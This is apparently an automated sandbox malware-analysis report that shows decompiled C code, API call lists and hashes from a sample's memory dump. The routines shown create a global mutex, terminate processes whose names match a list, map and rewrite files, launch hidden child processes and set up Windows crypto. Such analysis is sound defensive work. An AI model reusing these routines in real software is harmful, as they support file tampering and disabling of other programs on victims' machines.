Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
lstrcpyW.KERNEL32 ref: 004045CF
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B

Strings

Global\, xrefs: 004045C9

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
Instruction ID: 4f5a3050133a9d70e6d79b6919bbb594e2943cbf5e181e58d482f905f9ddffb5
Opcode Fuzzy Hash: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
Instruction Fuzzy Hash: 6721D4B16503217BE224A724DC4BF6F7A5CDB80744F500639F706761D0EAB87D0486EE

Uniqueness

Uniqueness Score: -1.00%

Function 00407720 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407720(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x00407721
0x0040772d
0x00407739
0x00407739
0x0040773f
0x0040774b
0x0040774b
0x00407751
0x0040775d
0x0040775d
0x00407763
0x0040776f
0x0040776f
0x00407775
0x00407781
0x00407781
0x00407787
0x00407793
0x00407793
0x00407799
0x004077a5
0x004077a5
0x004077ab
0x004077b7
0x004077b7
0x004077bd
0x004077c9
0x004077c9
0x004077d2
0x00000000
0x004077e1
0x004077e5

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407739
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040774B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040775D
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040776F
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407781
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407793
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077A5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077B7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077C9
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077E1

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
Instruction ID: 79a2428a1de1d862086b34f36251e2aa8ec78ad52842245a2806986d354140b0
Opcode Fuzzy Hash: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
Instruction Fuzzy Hash: C7211C30280B04AAF7762B15CC4AF66B2E1BB40B45F254839F2C1395F08BF97889DF09

Uniqueness

Uniqueness Score: -1.00%

Function 00402890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				signed int _t14;
				void* _t18;
				void* _t19;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t24;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t34 = _t9;
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E00403030(0, _t34, _t35); // executed
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E00403030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
					_v16 = _t18;
					if(_t18 != 0) {
						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
						_t38 = _t19;
						if(_t38 != 0) {
							_t23 = E00403030(0, _t34, _t38); // executed
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6, executed
								E00407DB0(_t29, _t5); // executed
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t24 = E00402830(_v12, _t38, _v8); // executed
							_t28 = _t24;
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x00402890
0x00402899
0x0040289b
0x004028ab
0x004028b1
0x004028b6
0x004028f9
0x00402901
0x004028b8
0x004028c0
0x004028c3
0x004028ca
0x004028cf
0x004028d0
0x004028d8
0x004028e5
0x004028eb
0x004028f0
0x0040290a
0x00402910
0x00402914
0x00402916
0x0040291d
0x0040291f
0x00402920
0x00402920
0x00402923
0x00402926
0x0040292b
0x0040292b
0x0040292e
0x00402937
0x0040293f
0x00402942
0x00402942
0x00402951
0x00402954
0x0040295e
0x004028f2
0x004028f3
0x00000000
0x004028f3
0x004028f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,00402C02), ref: 004028AB
GetFileSize.KERNEL32(00000000,00000000,?,?,00402C02), ref: 004028BA
CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,00402C02), ref: 004028E5
CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 004028F3
MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,00402C02), ref: 0040290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,00402C02), ref: 00402942
CloseHandle.KERNEL32(?,?,?,00402C02), ref: 00402951
CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 00402954

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 4a3bd338fa8f98e6ea1ce6eff48d1651597d918e060f7fce2cadfb8332af991f
Instruction ID: c7753fadabc3ce0f8503889d90d66a1a67b62c86d4c9c93fbc6d336bdc04640e
Opcode Fuzzy Hash: 4a3bd338fa8f98e6ea1ce6eff48d1651597d918e060f7fce2cadfb8332af991f
Instruction Fuzzy Hash: 8A2134B2B011197FE7106B749D8AF7F7B6CEB45225F00423AFC01B22C1E6789D0045A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404B10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404B10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				int _t20;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E00408B30( &_v92, 0, 0x44);
				_t15 =  *0x412b0c; // 0x9d4
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0x412b08; // 0x9d8
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				_t20 = CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20); // executed
				if(_t20 != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x00404b1c
0x00404b22
0x00404b24
0x00404b29
0x00404b2e
0x00404b36
0x00404b39
0x00404b3c
0x00404b41
0x00404b48
0x00404b4d
0x00404b58
0x00404b6f
0x00404b77
0x00404b8d
0x00404b98
0x00404b79
0x00404b83
0x00404b83

APIs

_memset.LIBCMT ref: 00404B29
CreateProcessW.KERNEL32 ref: 00404B6F
GetLastError.KERNEL32(?,?,00000000), ref: 00404B79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B92

Strings

D, xrefs: 00404B58

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
Instruction ID: c9167ab5344422c8a44933cba82276f3a3bd4aa998c81f02b44ccbb638d81527
Opcode Fuzzy Hash: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
Instruction Fuzzy Hash: E3014471E40319ABDB10DFA4DC46BDE7BB8EF04714F104226FA08FA190E7B569548B98

Uniqueness

Uniqueness Score: -1.00%

Function 004047F8 Relevance: 10.5, APIs: 7, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047F8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x004047f8
0x004047f8
0x00404800
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x00404842
0x00000000
0x00000000
0x00404844
0x00404844
0x0040484a
0x00404850
0x00404850
0x00404855
0x004047f4
0x00404800
0x00000000
0x00000000
0x00000000
0x00404800
0x00404859
0x00404863
0x00404863
0x0040486a
0x00404872
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x0040483f

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
CloseHandle.KERNEL32(00000000), ref: 00404831
Process32NextW.KERNEL32(?,00000000), ref: 0040484A
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404863
FindCloseChangeNotification.KERNEL32(?), ref: 0040486A

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID:
API String ID: 3573210778-0
Opcode ID: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
Instruction ID: 1a13c8a93cbec1d8c6bc579d8d4bacd9a5b995379d62742e90ee94b5f9f4cf80
Opcode Fuzzy Hash: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
Instruction Fuzzy Hash: 7E01D6B7200111ABEB102F10AD48B6B7368EBD5301F104435FF49B61A1EB759C05CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406D10 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406D10(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x00406d26
0x00406d30
0x00406d84
0x00406d32
0x00406d35
0x00406d47
0x00406d4f
0x00406d66
0x00406d6f
0x00406d7b
0x00406d51
0x00406d54
0x00406d57
0x00406d63
0x00406d63
0x00406d4f

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
RegCloseKey.KERNEL32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
GetLastError.KERNEL32(?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D66
RegCloseKey.ADVAPI32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D6F

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
Instruction ID: 038fbdeb07fc8f9d94efb3036f8b9b37cf4c52d37effb2f9ef8d9ff464795a08
Opcode Fuzzy Hash: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
Instruction Fuzzy Hash: 3D011A7260011CABCB209F94EE09DDA7B7CEF08351F008162FD05E6121D7329E20EBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00402830 Relevance: 4.5, APIs: 3, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00402830(WCHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t3;
				int _t7;
				void* _t9;
				void* _t14;
				struct _OVERLAPPED* _t17;

				_push(__ecx);
				_t9 = __edx; // executed
				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_t14 = _t3;
				_t17 = 0;
				if(_t14 != 0xffffffff) {
					if(_t9 == 0) {
						L3:
						_t17 = 1;
					} else {
						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
						if(_t7 != 0) {
							goto L3;
						}
					}
					FindCloseChangeNotification(_t14); // executed
				}
				return _t17;
			}

0x00402833
0x0040284a
0x0040284c
0x00402852
0x00402854
0x00402859
0x0040285d
0x00402873
0x00402873
0x0040285f
0x00402869
0x00402871
0x00000000
0x00000000
0x00402871
0x00402879
0x00402879
0x00402887

APIs

CreateFileW.KERNEL32(00402C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00402C02,?,0040293C,?), ref: 0040284C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040293C,?,?,?,?,00402C02), ref: 00402869
FindCloseChangeNotification.KERNEL32(00000000,?,0040293C,?,?,?,?,00402C02), ref: 00402879

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: 9e9a3c89b6850285b0aaeb729945f32371e326f8768ed0970ed47c3756836101
Instruction ID: 04185e8f6c4e23bdd04b7cf8f7d55746a19b6698dc5ace76ea1193252a574fad
Opcode Fuzzy Hash: 9e9a3c89b6850285b0aaeb729945f32371e326f8768ed0970ed47c3756836101
Instruction Fuzzy Hash: 9CF0827734021477F6201A96AD8DF6BB65CD786B60F104236BA08B61D1D6B5DC0152A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404CB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CB0(void* __ebx, CHAR* __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				CHAR* _v12;
				long _v16;
				void _v4112;
				char* _t18;
				char* _t21;
				intOrPtr _t24;
				char _t26;
				void* _t31;
				void* _t33;
				void* _t38;

				E004084B0(0x100c);
				_v8 = __edx;
				_v12 = __ecx;
				while(1) {
					L1:
					_t18 = ReadFile( *0x412b10,  &_v4112, 0x1000,  &_v16, 0); // executed
					_t24 = _v4112;
					_t33 =  &_v4112;
					_t21 = _t18;
					if(_t24 == 0) {
						break;
					}
					_t38 = _t33 - "Can\'t find server";
					do {
						_t18 = "Can\'t find server";
						if(_t24 == 0) {
							goto L9;
						} else {
							while(1) {
								_t26 =  *_t18;
								if(_t26 == 0) {
									goto L1;
								}
								_t31 =  *((char*)(_t38 + _t18)) - _t26;
								if(_t31 != 0) {
									L8:
									if( *_t18 == 0) {
										goto L1;
									} else {
										goto L9;
									}
								} else {
									_t18 =  &(_t18[1]);
									if( *((intOrPtr*)(_t38 + _t18)) != _t31) {
										continue;
									} else {
										goto L8;
									}
								}
								goto L10;
							}
							goto L1;
						}
						goto L10;
						L9:
						_t24 =  *((intOrPtr*)(_t33 + 1));
						_t33 = _t33 + 1;
						_t38 = _t38 + 1;
					} while (_t24 != 0);
					break;
				}
				L10:
				if(_t21 != 0 && _v16 != 0) {
					return E00404BA0( &_v4112, _v12, _v8);
				}
				return _t18;
			}

0x00404cb8
0x00404cbf
0x00404cc2
0x00404cc6
0x00404cc6
0x00404cde
0x00404ce4
0x00404cea
0x00404cf0
0x00404cf4
0x00000000
0x00000000
0x00404cf8
0x00404d00
0x00404d00
0x00404d07
0x00000000
0x00404d10
0x00404d10
0x00404d10
0x00404d14
0x00000000
0x00000000
0x00404d1d
0x00404d1f
0x00404d27
0x00404d2a
0x00000000
0x00000000
0x00000000
0x00000000
0x00404d21
0x00404d21
0x00404d25
0x00000000
0x00000000
0x00000000
0x00000000
0x00404d25
0x00000000
0x00404d1f
0x00000000
0x00404d10
0x00000000
0x00404d2c
0x00404d2c
0x00404d2f
0x00404d30
0x00404d31
0x00000000
0x00404d00
0x00404d35
0x00404d3a
0x00000000
0x00404d53
0x00404d59

APIs

ReadFile.KERNEL32(?,00001000,00000000,00000000,00000000,00000000,00000000,?,00404E7E), ref: 00404CDE

Strings

Can't find server, xrefs: 00404CF8, 00404D00

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: Can't find server
API String ID: 2738559852-1141070784
Opcode ID: ba09573ce324996396f8dcbb0825618a8ba3ca0830273c127b8c0ebe83a17994
Instruction ID: 28e4a0bf322fcfe5cc8b20f66b714b44768279d7133ed13092125b5fab13ce64
Opcode Fuzzy Hash: ba09573ce324996396f8dcbb0825618a8ba3ca0830273c127b8c0ebe83a17994
Instruction Fuzzy Hash: 9A115E749042999BEB32CB5099107EBBBB8DF86306F1481F7DE8477390D6781D44C754

Uniqueness

Uniqueness Score: -1.00%

Function 00405EF0 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405EF0(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E00405D80( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x00405ef3
0x00405ef4
0x00405f05
0x00405f0e
0x00405f1f
0x00405f28
0x00405f2d
0x00405f37
0x00405f55
0x00405f59
0x00405f63
0x00405f68
0x00405f68
0x00405f72
0x00405f7f

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0040491E), ref: 00405F05
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0040491E), ref: 00405F1F

Part of subcall function 00405D80: CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00404916,?,0040491E), ref: 00405D95
Part of subcall function 00405D80: GetLastError.KERNEL32(?,0040491E), ref: 00405D9F
Part of subcall function 00405D80: CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0040491E), ref: 00405DBB

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

